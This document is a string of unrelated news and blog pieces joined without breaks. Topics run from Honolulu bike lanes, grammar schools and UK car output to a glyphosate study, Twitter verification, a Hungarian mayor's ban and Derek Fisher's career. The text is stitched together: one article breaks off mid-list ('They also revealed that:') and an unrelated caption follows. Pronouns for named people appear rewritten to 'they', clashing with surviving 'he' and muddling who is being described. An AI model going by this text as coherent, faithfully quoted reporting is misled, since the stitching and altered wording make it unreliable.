Given the pleasant weather, flat landscape and urban density, many Oahu residents want to ride bikes. Since the city debuted the King Street protected bike path in December 2014, ridership on the Honolulu street has increased 78 percent, according to its ongoing ridership studies.
Today, the 2-mile bike path, from Alapai Street to Isenberg Street, is Oahu's most traversed bikeway. (There are 61 U.S. cities that have protected bike lanes.) Riders and advocates say that's likely because the lane has an asphalt berm and short plastic posts that physically separate cyclists from motorists. A 2016 report by the National Association of City Transportation Officials says 60 percent of Americans are interested in biking but are concerned about safety. Of those respondents, 81 percent said they would ride on a street with a separated bike lane.
Mark Garrity, acting director of the city Department of Transportation Services, says the city doesn't want the King Street project to be a one-off. “We understand that King Street (bike lane) by itself may have helped a few people, especially those people commuting between downtown and the university area,” they say. “But for it to be effective and for people to make up their minds that they want to use bicycles on a regular basis, we need to create a network of protected streets.” To do this, they say, the city is looking to create a line item in the upcoming budget specifically for bike lane projects. (Bike lane projects currently come out of the existing transportation budget; the King Street project was about $500,000.) Garrity adds the city is designing traditional bike lanes for South and McCully streets, to connect with the King Street lane, and is eyeing Ward Avenue, Pensacola Street, Piikoi Street and Queen Street for future projects.
Robert Moses welcomes the new infrastructure. The Realtor has been riding bicycles recreationally for 50 years, and commuting via bike for the past year. And three times a week, they and their wife, Genie, bike from their condo in Century Center to Kapiolani Park and back, using the Date Street and Kapahulu Avenue bike paths. Safety is a top concern, especially when cycling in traffic. Before hopping on their bike, Moses straps on their helmet, knee and elbow pads, and a safety vest. Their bike is also equipped with a headlight and taillight.
“I think the simplest way to improve safety is to build more protected bike lanes,” they say, adding, “safe places to park bikes are not universal.”
The city has installed about 450 bike racks, which don't include bike racks on private property that are available to the public, says city spokesperson Jesse Broder Van Dyke. Most of the racks are located in urban Honolulu and Waikiki; Kailua has 19, but Oahu's Leeward side only has one city-installed rack, which is in Kapolei, according to city data. Residents can request that a bike rack be installed in specific city-owned public locations, by calling or emailing the Honolulu Bicycle Program coordinator: 768-8335 and csayers@honolulu.gov.
“We want our roads to be accessible for all, safe for all,” says Daniel Alexander. For the past two and a half years, Alexander's job has been to make cyclists feel safer.  They are the advocacy, planning and communications director of the Hawaii Bicycling League, working with advocates, the community, developers and Hawaii's governments to help implement bicycling policies and infrastructure across Oahu. In 2015, the Hawaii Bicycling League debuted the Minimum Grid HNL project, which supports the creation of a network of protected bikeways within a half-mile of everyone in urban Honolulu and within one mile of everyone in urbanized Oahu. The goal is to have 20 miles of protected bike lanes on the Island by 2020. “When we talk to people, people want to be able to bike. It's a big desire, but the fact is they don't feel safe on a lot of our roads,” they say.
The math is simple, they say. An increase in bike infrastructure results in more riders. They say studies have shown that the upswing in cyclists leads to better awareness and safety for both cyclists and motorists, and increases road capacity as fewer people drive.
“I think as we start building more infrastructure and build a network where people can get from their house to the store, from their house to work, or their hotel to their destination, then a lot more people will adopt cycling,” they say.
BEHIND THE SCENES
Ride along with the Hawaii Bicycling League in this video captured in December as part of our photo shoot for this story.
Ofsted chief inspector Sir Michael Wilshaw has described the idea that a new wave of grammar schools would help the poor as "palpable tosh and nonsense".
The Government is widely expected to announce plans to allow more schools to academically select in the coming weeks, with social mobility likely to be a key justification for the policy.
But in a speech this morning Sir Michael said: "​I appreciate that many grammar schools do a fine job in equipping their students with an excellent education. But we all know that their record of admitting children from non-middle-class backgrounds is pretty woeful."
The chief inspector highlighted the improvements of school standards in inner London and said: "If grammar schools are the great answer, why aren't there more of them in London?"
They also pointed to the mix of the pupils in "the small number of London boroughs that have grammar schools".
"The proportion of disadvantaged children in the four grammar schools in Bexley, for example, is around 9 per cent compared to 28 per cent in its non-selective schools. Similarly in Sutton, where five out of the 14 schools are grammar schools, the proportions are about 7 per cent compared to 25 per cent.
"The notion that the poor stand to benefit from the return of grammar schools strikes me as quite palpable tosh and nonsense – and is very clearly refuted by the London experience."
Their comments follow an interview on Saturday when Sir Michael also condemned the idea of more grammar schools.
Speaking to the Times, the chief inspector said: "I think we will go backwards if we return to a system where we only expect some kids to do well. Every time you create a grammar school you create three secondary moderns and no one is queueing up to go to a secondary modern.”
The government's plans first emerged last month and have faced a storm of criticism from the education sector.
Sir Michael, who led two successful comprehensives in East London before taking up the job at Ofsted, went on: "If someone had opened up a grammar school next to Mossbourne Academy, I would have been absolutely furious as it would have taken away those youngsters who set the tone of the school. Youngsters learn from other youngsters and see their ambition; it percolates throughout the school.
"That is why we sent so many children to great universities. If the grammar schools had siphoned off those top 20 per cent, we would have floundered.”
"In Kent [which has selection] the gap in attainment between free-school-meals and non-free-school-meals pupils at key stage 4 is 34 points. If you go to inner London where there are no grammar schools, the gap is 14 points so it is socially divisive.”
Sir Michael used their Saturday interview to attack mixed-ability teaching, speaking out in favour of setting. "Mixed ability has also been a failure," they said. "I don't care what anyone says, it rarely works. It didn't operate in the schools I led."
They also revealed that:
Image caption The rise in UK car production was driven by domestic demand
UK car production in October rose at the fastest pace so far this year, and British industrial output is at its highest since 1995, organisations have reported.
The Society of Motor Manufacturers and Traders (SMMT) said the number of cars built in October was up 17% from 2012.
It said the change was the biggest year-on-year increase to date in 2013.
The growth was largely driven by demand for cars to sell in Britain rather than for export, the SMMT said.
It reported 160,854 cars were built in the UK last month, with demand being driven by cheap finance deals and rising consumer confidence.
So far this year, the industry has produced 1,286,287 cars, 5.4% more than at the same point in 2012, the SMMT said.
"UK car manufacturing for the home market increased strongly in October," said SMMT chief executive Mike Hawes.
"With European demand showing early signs of recovery, we expect production to continue positively in the coming months."
'Deepening recovery'
Activity in Britain's factories was also up, with order numbers at the highest level since March 1995, according to the Confederation of British Industry (CBI).
The CBI's industrial trends survey's total orders showed a positive balance of 11 in November from minus four in October, beating predictions of zero and the average of minus 17.
Total output for the three months to November was at its highest level since January 1995.
Director of economics at the CBI Stephen Gifford said the growth showed "encouraging signs of a broadening and deepening recovery".
They said: "Manufacturers finally seem to be feeling the benefit of growing confidence and spending within the UK and globally."
So about an hour ago I posted my dad's story to Reddit with the hope that reddit might show their unbelievable goodwill that they have in the past here, with my dad's situation. The situation is this: My dad is facing more than 10,000 in debt, most of which is for their hospital bills in the past two weeks. Some of it has to do with the IRS and documents they can't get their hands on because their former employeer went out of their way to manipulate them into not leaving that company.
My dad just wanted to be paid wages people in their position made. They stayed in that position a lot longer then most people would, and when they finally told their boss that they were leaving, their boss made sure they couldn't find a job anywhere else in the Florida restaurant supply market.
We've watched the IRS situation came crashing down around him, and then the new cancer on their ear. We saw their earlier medical bills, dealing with California public health care system and it's bureaucracy (which said they made 126 dollars too much on unemployment to qualify for state benefits and this is California's health care system telling them that for shit's sake). It's just absolutely unbelievable. We had to do something right? At least, we'd thought that we'd try… try and ask total strangers to help a guy they've never met try and break even after everything that could go wrong did. He's been looking for work since November and can't find anything.
We're not asking for huge donations from people we don't know. Maybe a dollar, maybe 50 cents, maybe even an up vote so that it might reach front page.
I was a little uncomfortable putting this on reddit. The causes that redditors champion have blown me away in the past. I think about the things that redditors contribute towards and I know that generally they are these dire situations. I worry that people will see this blog and just dismiss my dad's need off hand because he's not at death door.
Not yet at least. Until the pathology comes back on their ear we'll have no idea whether or not the cancer will escalate. We have no idea what kind of payment plan the IRS will put them on if we don't find some way to help them pay for this. How long it will be before they can get back on their feet financially? Will they have to go into bankrupcy and start from scratch once he's in their 60's?
No one should have to do that. And I know people do but if theres a way we can help him, I'll find it. He's my dad and there is nothing I wouldn't do for him.
The herbicide Roundup is sprayed onto genetically modified crops and applied as a desiccant to most small non–genetically modified grains. Use of this herbicide has increased since 1994 when genetically modified crops were introduced in the United States. Glyphosate, the primary ingredient in the herbicide, is found in these crops at harvest.1 Environmental exposure through dietary intake of these crops has potential adverse health effects and can be assessed by measuring urinary excretion.2-4 We measured excretion levels of glyphosate and its metabolite aminomethylphosphonic acid (AMPA) in participants from the Rancho Bernardo Study (RBS) of Healthy Aging.
Methods
The RBS, established in 1972, is a prospective study of 6629 adults older than 50 years residing in Southern California.5 As of 2016, approximately 1000 participants were active (the primary reason for loss to follow-up was mortality). Of those 1000 participants, 112 had routine morning spot urinary biospecimens obtained at each of 5 clinic visits that took place from 1993 to 1996 and from 2014 to 2016. One hundred of these 112 were randomly selected for this study, which was approved by the University of California, San Diego, institutional review board. All participants gave written informed consent.
Samples were analyzed using high-performance liquid chromatography coupled with mass spectrometry. Limits of detection (LOD) were 0.03 μg/L for glyphosate and 0.04 μg/L for AMPA; assays were linear up to 50 μg/L. Analyses were normalized to each sample's specific gravity, thereby accounting for dilution or concentration effects due to variability in water intake and age-related or other differences in renal function. Changes over time in the proportion of samples above the LOD were assessed using generalized estimating equation models to account for the dependency of observations in repeated measures. A 2-sided significance threshold was set at less than .05. Statistical analyses were performed using R (R Foundation), version 3.3.2.
Results
Among the 100 participants in this study, the mean age in 2014-2016 was 77.7 years (SD, 6.6) and 60% were women. These values were not different from the 112 with urine specimens but were older than the entire group of 1000 active participants in the RBS (mean age, 71.7 years [SD, 12.0]) (P < .001).
The mean glyphosate level increased from 0.024 μg/L in 1993-1996 to 0.314 μg/L in 2014-2016, and reached 0.449 μg/L in 2014-2016 for the 70 participants with levels above the LOD (Table 1). Mean AMPA levels increased from 0.008 μg/L in 1993-1996 to 0.285 μg/L in 2014-2016, and reached 0.401 μg/L in 2014-2016 for the 71 participants with levels above the LOD.
The prevalence rates of glyphosate samples above the LOD increased significantly over time, from 0.120 (95% CI, 0.064-0.200) in 1993-1996 to 0.700 (95% CI, 0.600-0.788) in 2014-2016 (Wald statistic = 80.5; P < .001) (Table 2). The prevalence of AMPA samples above the LOD increased significantly from 0.050 (95% CI, 0.016-0.113) in 1993-1996 to 0.710 (95% CI, 0.611-0.796) in 2014-2016 (Wald statistic = 103; P < .001).
Discussion
Mean glyphosate and AMPA levels and the proportion of samples with detectable levels increased over time. A 2015 review of nonfarmer US and European adults reported mean urinary glyphosate levels of 1.35 μg/L and 0.215 μg/L, respectively.6 The values observed in this study fall within this range and were higher than in European adults. Animal and human studies suggest that chronic exposure to glyphosate-based herbicides can induce adverse health outcomes.3 Animals consistently fed an ultra-low dosage of the herbicide with a 50-ng/L glyphosate concentration show hepatotoxicity consistent with nonalcoholic fatty liver disease and its progression to steatohepatosis.4 In July 2017, in accordance with the Safe Drinking Water and Toxic Enforcement Act of 1986, the state of California listed glyphosate as a probable carcinogen.
Limitations of this study include that the cohort lived in Southern California, which might have different exposures than other states, only a subset of RBS participants were studied, urinary levels represent recent exposure, urinary-specific gravity is reduced with age, and data on clinical outcomes were not evaluated. Future studies of the relationships between chronic glyphosate exposure and human health are needed.
Section Editor: Jody W. Zylke, MD, Deputy Editor.
Back to top Article Information
Correction: This article was corrected for an omission in the Conflicts of Interest section on April 3, 2018.
Accepted for Publication: July 31, 2017.
Corresponding Author: Paul J. Mills, PhD, University of California, San Diego, 9500 Gilman Dr, La Jolla, CA 92093-0725 (pmills@ucsd.edu).
Author Contributions: Dr Mills had full access to all of the data in the study and takes responsibility for the integrity of the data and the accuracy of the data analysis.
Concept and design: Mills, Laughlin.
Acquisition, analysis, or interpretation of data: All authors.
Drafting of the manuscript: Mills, Fagan.
Critical revision of the manuscript for important intellectual content: All authors.
Statistical analysis: Mills, Fagan.
Obtained funding: Mills, McEvoy, Barrett-Connor.
Administrative, technical, or material support: Korwel, Fagan, Laughlin.
Supervision: Mills, Fagan, Barrett-Connor.
Conflict of Interest Disclosures: The authors have completed and submitted the ICMJE Form for Disclosure of Potential Conflicts of Interest. Dr Mills reported launching a citizen science crowdfunding site to raise funds for additional research that offers free glyphosate testing with a donation of $130, with tests being run by Health Research Institute (HRI) Laboratories, which processed the samples for the study, and proceeds going to the University of California, San Diego. Dr Fagan reported being founder, chairperson of the board, and senior scientist at HRI Laboratories, a 501(c)(3) nonprofit research organization, which is conducting a citizen science research program in which individuals complete a lifestyle and diet survey, provide a urine sample, and partially cover the cost of testing the urine sample for glyphosate ($99/sample). Dr McEvoy reported receiving a grant from the National Institutes of Health. No other disclosures were reported.
Funding/Support: The Rancho Bernardo Study was funded by grant AA021187 from the National Institute on Alcohol Abuse and Alcoholism, grants AG028507 and AG007181 from the National Institute on Aging, and grant DK31801 from the National Institute of Diabetes and Digestive and Kidney Diseases. Additional support for this study was provided by the Solomon Dutka Fund in the New York Community Trust, the Caroline Young Foundation, and the Westreich Foundation.
Role of the Funder/Sponsor: The funders had no role in the design and conduct of the study; collection, management, analysis, and interpretation of the data; preparation, review, or approval of the manuscript; and decision to submit the manuscript for publication.
Twitter will start sanctioning users for their offline behavior starting Saturday, according to a report.
According to the Verge, “What's new is that Twitter now plans to do at least some monitoring of verified users' offline behavior as well, to determine whether it is consistent with its rules.”
“If it isn't, users can lose their [verification] badges. And so a hypothetical verified user who tweeted nothing but pictures of kittens but organized Nazi rallies for a living could now retain their tweeting privileges, but lose their verification badge,” they explained.
In their own article, Mashable added that Twitter has “given users until December 18, 2017, when it will then begin enforcing the rule.”
“The month-long wait is due to regulations in the European Union that require companies to inform users of a new policy change 30 days prior to enforcement,” they claimed, adding that the “deadline also applies to using ‘hateful images or symbols' in profile images or profile headers.”
“Twitter will also monitor for hate speech in usernames, display names, and profile bios,” Mashable concluded.
On Wednesday, several conservative users lost their verification badges, which were originally implemented on Twitter to show that an account was official.
Anti-Islam activist, author, and commentator Tommy Robinson, and commentator Laura Loomer both lost their verification badges, along with alt-right thought-leaders Richard B. Spencer, Jason Kessler, and James Allsup.
The deverifications came after a terms of service change on the platform, which declared users can now lose their verification badges for “promoting hate.”
Charlie Nash is a reporter for Breitbart Tech. You can follow them on Twitter @MrNashington and Gab @Nash, or like their page at Facebook.
Malcom Floyd doesn't know when they can get back on the football field -- or if that's even a possibility.
'ATL Podcast' The
The Around The League team hits all the NFL's hottest topics in its award-winning podcast. Join the conversation. Listen
The San Diego Chargers' wide receiver is continuing to work their way back from a spinal disc issue caused by an open-field hit in September. They told U-T San Diego on Saturday that they resumed running one month ago. A spinal specialist recently cleared Floyd for light weightlifting.
Floyd admits there still is soreness in the neck and has acknowledged they were wearing a neck brace as recently as January. The recovery process continues, now nearly six months removed from the injury.
"It's not quite there yet, but it's getting there," Floyd said. "There's really no timetable. It's pretty much just basing it on how I am and how well I feel. ... There's still a little discomfort in there, but it's a lot better.
"I'm getting there. It just felt good to start running again and becoming more active. I'm feeling a lot better as far as that goes."
A healthy Floyd -- who is due a manageable $2.75 million next seasons -- would represent a nice fit alongside Keenan Allen in San Diego. The question is whether Floyd will be able to put themselves in that position.
The latest edition of the "Around The League Podcast" works through our top 101 free agents and responds to some heat from Donte Whitner.
Periods happen to the best of us.
You're wearing white shorts while meeting your significant other's family for the first time. You're swimming with sharks on your vacation in Bermuda. It's your wedding day. Dear Aunt Flow doesn't care. She's insistent upon their monthly visit, and she's likely to wreak a little havoc while she's here.
Fortunately, you're an adaptable being and you have more than a few tricks up your sleeve. These devices, passed down through generations and whispered through the stalls of middle school bathrooms, have become highly-honed skills to help you deal with these little inconveniences.
No matter what Mother Nature throws your way, you will be ready.
This problem is surely one of the most common, yet still produces gut-wrenching panic upon realization that you are without the necessary menstrual supplies. You curse yourself for using all your pads or tampons during your last cycle and failing to think ahead. This happens every time and you never learn...
But enough of that. You're on a mission, and you need to make do with what you have. Enter:
It's not the most desirable or comfortable form of protection, but makeshift pads have saved many women caught in a tight spot. Toilet paper is easy to come by in public restrooms, and is a renowned favorite for this homemade contrivance. You know you can count on admissible protection for an hour or so, giving you just enough time to get to the store.
Even after procuring menstrual supplies and basking in the momentary glow of relief, there will be challenges to face. You hide your situation from your fellow humans out of some urgent need to pretend you don't experience bodily functions. The tricks you use to ensure discretion are feats of human ingenuity at its highest level.
Sometimes, even when you take all necessary precautions, the worst of all period nightmares will befall you: the butt stain. Fortunately, brave women who came before you developed ingenious techniques to help you overcome this misfortune in style! What's even better - this boho-chic look is so in right now.
Let's not even get started on the physiological symptoms that plague you on your period. Some women are lucky enough not to encounter these problems, but you experience painful cramps, bloating, headaches, and other discomforts. Day to day life under these circumstances is no walk in the park - especially as you ride an aggressive emotional roller coaster. However, you soldier on and mask your pain to the world. Who has time to let the violent contractions of their uterus slow them down? You certainly don't.
There's life to be lived, after all.
Women jump through a lot of hoops to make sure their periods are easier for themselves and more comfortable for those around them. If you think about it, it's pretty impressive. Periods can cause annoyances, but they are also normal and healthy. Your period is just one component of the amazing cycle your body follows - and that's something to celebrate. Whether or not you want a child, the extraordinary ability of your body to create life is just so cool.
Let's all take a moment and appreciate our bodies for their abilities and incredible complexities.
You go, girl.
--------
Periods can be even harder for women and girls who don't have access to necessary menstrual supplies. To learn more about our work with AFRIpads, click here.
While the Hip Hop world anxiously anticipates the outcome of Freddie Gibbs‘ recent decision to sign with Young Jeezy's Corporate Thugz Entertainment label, the Gary, Indiana lyricist says he's not worried, nor do they feel much pressure, due to their confidence.
“I didn't get into this to be the most famous rapper,” they told Conspiracy Worldwide Radio. “I'm just getting started. I haven't even gotten my feet wet yet, I still got a long way to go. I haven't even dropped my first album yet. There are a lot of things that I haven't done yet, and I'm still further along than other people.”
They confirmed that they will be releasing a collaborative album soon, but when asked about who he'd be collaborating with, they gave little details. “I can't tell you,” they said. “It's with a producer. Just me and a producer.”
They also kept mum about whether this producer is one of the top producers in the industry. “He might be. You know, [in the] underground [scene]. I don't know who gets the most respect production-wise. You got mainstream dudes. You got so many guys out here, but yeah he's definitely one of the most top respected guys. It ain't like [Dr.] Dre or Timbaland or anybody like that but it's [someone] who's name holds weight…We're releasing some music from it real soon so people are going to hear it and they'll know who it is.”
Freddie Gibbs has not yet released a full album, but may drop their debut this year. Their interview below, begins at the 1 hour 39 minute mark.
[May 27]
UPDATE: After learning that Freddie Gibbs hinted at the collaboration, Statik Selektah nearly confirmed that they are the producer who will handle the musical side of their upcoming joint LP.
ok people. put it together 😉 http://bit.ly/iQAFFe Statik Selektah
StatikSelekt
(May 28)
UPDATE #2: Today, Statik Selektah has confirmed that they will record Lord Giveth, Lord Taketh Away on June 22 with Freddie Gibbs. Completed within 24 hours after being recorded at Statik's home studio in Brooklyn, New York, the project will release to iTunes on June 24.
XXLMag.com will host a live 24-hour UStream.TV webcast of the recording, with Karmaloop and L-R-G also on hand with sponsorship. Guests are expected, though no names have been confirmed.
HipHopDX will keep you posted.
(June 17)
UPDATE #3: According to Statik Selektah, over 90,000 people tuned into UStream.TV to watch the recording of their The Lord Giveth, The Lord Taketh Away album with Freddie Gibbs. The tracklisting is as follows:
1. Intro ft. Slaine
2. Lord Giveth Lord Taketh Away
3. Rap Money ft. Daz Dillinger
4. Affiliated ft. Reks & PUSH! Montana
5. Wild Style ft. Termanology & Fred The Godson
6. Already ft. Trae Tha Truth
7. Keep it Warm For Ya ft. Smoke Dza & Chace Infinite
The project is expected to release to iTunes tomorrow.
The mayor, Laszlo Toroczkai, recently banned hijabs and other head coverings worn by Muslim women, as well as mosques and the call to prayer. “A politician who does not see what is going on in Europe is either blind or is a liar. The uncontrolled mass immigration will irreversibly change Europe,” Toroczkai explained in an email.
Although parliament will debate the ban later this month, and an official complaint against it is being processed by the court system, the slow response has raised concerns. Is Toroczkai one man run amok, or do their views represent the wider population in Hungary?
“What worries me is the widespread lack of condemnation by Hungarian decision-makers,” said Todor Gardos, a researcher with the London-based human rights group Amnesty International. They called the local decree “clearly unconstitutional.”
A prolonged court battle would send dangerous signals, human rights advocates say. “Such laws legitimize xenophobia and homophobia. They entrench a hostile attitude which then paves the way for more anti-immigration laws. It's quite a vicious cycle,” Gardos said. Responding to questions by The Washington Post, Toroczkai vowed they would effectively reinstate their ban should it be struck down by the country's higher courts.
—
Although there has been a spike in xenophobia in Hungary since the beginning of the refugee crisis in 2015, hostility toward asylum seekers has been on a steady rise for years. In the past decade, the number of Hungarians opposed to accepting any asylum seekers has more than doubled, rising to 53 percent last year.
Prime Minister Viktor Orban has depicted themselves as one of the only European leaders willing to defend the continent's Christians. In Sept. 2015, they said that Muslims were threatening Europe's Christian identity, framing the issue as a clash between different civilizations.
Such rhetoric has turned Hungary into what critics describe as a hostile environment for Muslim migrants. Human rights organizations allege that Hungary has abused anti-terrorism laws to sentence individuals accused of rioting in refugee camps. The country currently also plans to propose an European Union law that would allow authorities to detain all asylum seekers while they are waiting for their applications to be processed.
Such a proposal has virtually no chance of becoming law because it would likely violate basic human rights. But human rights organizations fear Orban's real intention may be to fuel hostility at home. Toroczkai has been criticized for using similar rhetoric and pursuing the same goals as Orban. They even recorded a melodramatic anti-immigration video during the height of the refugee crisis in 2015.
“Hungary is a bad choice . . . Asotthalom is the worst,” said Toroczkai said in their video, in which they threatened to jail any refugees found guilty of illegal trespassing.
Toroczkai is known as a former leading figure of the far-right 64 Counties Youth Movement. More recently, they have had ties to the far-right Jobbik party, which secured more than 20 percent of the vote in the 2014 elections and pushed Orban's party to adopt more radical policy stances. “The mayor of Asotthalom is a member of the far-right party, but their policy stances are not that much more right-wing than those of the government,” Gardos said.
Along with the anti-Muslim order, Asotthalom also enacted a ban on public displays of affection by gay people. “There is a Muslim conquest going on in Europe [with] hundreds of mosques . . . being built all over,” they explained. “There is also a less spectacular conquest going on, and that is the almost violent spreading of extreme liberalism, which attacks the concepts of nation and family.”
Toroczkai says they have no regrets about their draconian new policies: “The only thing I feel sorry about is the fact that so far no other towns followed our example.”
Featured Image:
Advertisements
comments
This is part of my RPG series of entries here at SOB. See the inaugural entry in the series for more details.
In the following summary of events, I will ignore the (atrocious) GSL — WotC's D&D 4E “Game System License”, which replaces the much better D&D 3.5 OGL . This is about use licenses that lay out terms for fan sites to benefit from protection against otherwise potential copyright infringement suits.
What Happened?
WotC announced it was going to produce a D&D 4E. Paizo announced it was going to produce Pathfinder RPG as a continuation of the rules found in the 3.5 SRD. PRPG test versions were released under the OGL (other than product identity, et cetera) as free downloads. D&D 4E was released. Complaints about the lack of an available Web community use license, thus leaving fan Websites that refer to D&D 4E in an uncomfortable legal limbo where one could reasonably infer that the only way to develop content for fan sites is to take one's chances with the legal doctrine of fair use, prompted WotC to promise a Website and/or community use license at some unspecified point in the future. Months passed. WotC sent cease and desist orders to fan sites. Paizo announced its Community Use Policy, suitable for use with Pathfinder RPG materials, about half a year before the scheduled publication date of the final release form of the Pathfinder RPG.
Conclusion
Do you notice something odd here? I do:
Paizo delivers on promises I haven't even noticed it made while WotC is still very publicly making promises it hasn't yet kept. In fact, it looks like the trend is that WotC promises something, then Paizo delivers its own equivalent to what WotC promises, then WotC . . . may or may not deliver on its own promise.
While I'm at it, Paizo has also announced the availability of its Pathfinder Roleplaying Game Compatibility Policy — which, it turns out, is eminently reasonable — about half a year before it will even be applicable. I love this kind of advance “warning”.
Full Disclosure
Of course, I'm biased. I'm biased because:
I prefer open licensing over restrictive, punitive licensing. I prefer the system in Pathfinder RPG over that of D&D 4E (and over that of D&D 3.5, for that matter, though the differences are much less distinct in that case). I, um . . . really prefer open licensing over restrictive, punitive licensing.
Your mileage may vary, of course.
Disclaimer
I think it should be obvious that I'm neither a lawyer nor anyone with any official ties to Paizo Publishing, LLC. I've noticed that sometimes what I think should be obvious and what others find to be obvious do not always match up, however. Therefore:
Pollution has changed the chemistry of rivers in the eastern United States, according to researchers.
In a survey of rivers from Florida to New Hampshire, scientists found that two thirds of all rivers in the region are alkaline.
The study looked at the alkalinity trends among 97 rivers over 25 to 60 years. The rivers had indeed either become alkaline or increasingly alkaline over time.
None became more acidic over time.
The cause is believed to be the legacy left by acid rain, which, counter-intuitively raises the level of alkalinity.
Researchers say that despite acid rain being curbed by effective government policy, its legacy has lasting effects on the environment.
"This is another example of the widespread impact humans are having on natural systems. Policymakers and the public think that the acid rain problem has gone away, but it has not" said study author and ecologist Gene Likens, in a statement.
"Acid rain has led to increased outputs of alkalinity from watersheds and contributed to long-term, increasing trends in our rivers. And this is twenty years after federal regulations were enacted to reduce the airborne pollutants that cause acid rain."
Increased alkalinity in rivers affects drinking water and sewage treatment. It also increases the growth of algae.
The more alkaline the water, the more there is also a risk of ammonia toxicity, which can affect wildlife and food production near rivers.
The most alkaline rivers were found near Washington DC, Baltimore, Philadelphia and Atlanta - rivers which supply those cities' drinking water.
The findings were published in the journal Environmental Science and Technology.
Derek Fisher wrapped up an 18 year career last week (Presumption: Fisher has not officially announced their retirement) after their Oklahoma City Thunder were eliminated by the San Antonio Spurs in 6 games of the Western Conference Finals. Uncharacteristic of how the season has gone, Fisher played 32 minutes in their final game which is the most they have played in a playoff game in 3 years.
Fisher finished the game with a line of 5 points, 6 rebounds, 1 assist and 1 steal. Similar to their last game of their career Fisher has had very little impact this season for the Thunder and in the last few years which includes a short stint in Dallas.
There have been much better times for Fisher than the uneventful years that they have experienced since being traded by the Lakers to the Houston Rockets in 2012. While Fisher will not garner any Hall of Fame consideration, they have definitely left a lasting mark in both the NBA and most certainly Los Angeles Lakers history. Great leadership, dedication, toughness and their ability to deliver in the biggest moments is what highlights Fisher's time in the NBA; we take a look at 10 of the greatest moments of Derek Fisher's great career.
10. Becomes the NBA career leader in playoff games
Earlier in these playoffs when Fisher checked-in to the game against the Memphis Grizzlies on April, 29th they became the NBA all-time career leader in playoff game appearances with 245, passing former Lakers teammate Robert Horry. Fisher would go on to add to their career leading total and finished with 259 playoff games. Fisher played on teams that qualified for the playoffs in every season except 2, which were the years they spent with the Golden State Warriors.
9. Game winner vs. Mavs; last in a Lakers uniform
Fisher had made a career of hitting big shots and they added another one to their long list by knocking down a game winning 3 pointers against the Dallas Mavericks on January 16th, 2012. What made this particular game winner so memorable was that it was their last in a purple and gold uniform. Fisher was traded to the Houston Rockets for Jordan Hill just 2 months after their shot, ending their Lakers career.
8. Clutch 3 in game 7 of the 2010 NBA Finals
In a game where the Lakers trailed the Boston Celtics for most of the the deciding game 7 of the 2010 NBA Finals and by as many as 13 in the 2nd half, it was Fisher's 3 point shot with 6:11 remaining in the 4th quarter that finally got the Lakers even with the Celtics at 64 all. The Lakers would go on to take the lead and never relinquish it, leading to Fisher's 5th NBA title. Fisher finished the game with 10 points and one of the few Lakers that shot well, shooting 4 for 6 from the field and 2 for 2 from behind the 3.
7. The Speech that fueled the 2010 championship run
The Lakers had been floundering, losing 7 of their last 11 games to close out the 2009-10 season. Doing what Fisher had done many times before, they identified the need to gather the troops and delivered a motivational speech before the start of the start of the playoffs and their title defense. The exact words of the speech were never released, but all of the players acknowledged that it had a great effect in preparing them for their first round match up against the Thunder and putting them in the correct mindset for their playoff run. Mark Medina of the L.A. Times wrote an article about the impact of the Fisher's speech and provided some quotes from players in how it affected them. Being fueled by Fisher's words of inspiration, the Lakers went on to win the NBA championship that season, beating the Boston Celtics in 7 games.
6. Laying out Scola
In the best example that Fisher will do anything that is necessary to win, even getting their hands dirty, we look back to game 2 of the semi-finals series against the Houston Rockets in 2009. The Lakers having just lost game one of the series and being annoyed by the very physical and pesky front line of Ron Artest, Yao Ming and Luis Scola who was the main irritant with their very hard screens, Fisher took it upon themselves to send a message to the Rockets. In the closing seconds of the 3rd quarter Fisher absolutely levels Luis Scola who was attempting to set a screen for Aaron Brooks. Fisher was ejected for the football style hit on Scola and cost them the following game as well. Fisher returned in game 4 and the Lakers went on to close out the Rockets in 7 games.
5. Playing big with a heavy heart
The Utah Jazz were up 1-0 in their semi-finals match up against the Golden State Warriors of the 2007 NBA playoffs. Derek Fisher missed game 1 of the series due to being by the side of their daughter in New York who was undergoing eye surgery to treat a form of cancer. Following the successful surgery, Fisher flies from New York to Salt Lake City for game 2, arriving late in the 3rd quarter and makes the dramatic entrance. With everything that had gone on in day with this family, somehow Fisher is able to clear their mind and hit a huge 3 pointers in overtime that put away the game for the Jazz. Fisher scores 5 points in 9 minutes of regulation and overtime, helping the Jazz beat the Warriors, 127-117.
4. Fisher's career game helps Lakers sweep Spurs
Derek Fisher had the best game of their life at the best possible time. Fisher scored a career high 28 points on a scorching hot 11 for 13 from the field in game 4 of the 2001 Western Conference Finals against the Spurs which helped the Lakers complete a 4 game sweep. Fisher was absolutely on fire from deep in the game, knocking down 6 of 7 from behind the 3 point line.
The 2001 playoffs was Fisher's coming out party where they were a huge part of the Lakers historic, dominating run in the playoffs where they went 15-1, a record winning percentage that still stands today. Fisher averaged 13.4 points per game, which was behind only Shaq and Kobe, and shot a team best 51.5 percent from the 3 point line in the playoffs. The 28 point game by Fisher remained their Lakers career high.
3. Game 3 versus Boston in the 2010 Finals
In the pivotal game 3 of the 2010 NBA Finals, Derek Fisher comes up huge. The series was tied 1 game a piece and the Lakers were starting the first of 3 straight games in Boston. The Lakers needing to take game 3 Fisher delivers, scoring 11 points in the critical 4th quarter which includes the amazing play in the closing minute where Fisher goes coast to coast after a Celtics missed shot, beating the entire Celtics team and scoring a lay up and getting the foul that put the game away for the Lakers. Game 3 proved to be vital for the Lakers in the series as they went on to lose the remaining games in Boston, putting the Lakers in a must win situation for the final two games of the series back in Los Angeles.
2. Game 4 versus Orlando in the 2009 Finals
Fisher hit 2 of their biggest clutch shots in their career in game 4 of the NBA Finals against the Orlando Magic. With the Lakers trailing by 3 points with 4.6 seconds remaining in the game, Fisher nails a 3 pointer to tie the game and take the game to overtime. Fisher wasn't done there, hitting another big 3 in OT with 31.3 seconds remaining, helping the Lakers beat the Magic 99-91 and take a commanding 3 to 1 lead in the series. The Lakers finished off the Magic in game 5 and won the 2009 NBA championship, their first since 2002.
1. 0.4
In the history of sports, there are certain plays that are so iconic, so memorable that they are known simply by a few words. In the case of Fisher's greatest moment in their NBA career, it's a fraction of second: point-four. One reason that this play is so extraordinary was the improbability of the shot. NBA rules state that a player cannot catch and shoot a ball in less than 0.3 seconds and Fisher had only one-tenth more than what the NBA had deemed physically impossible to execute.
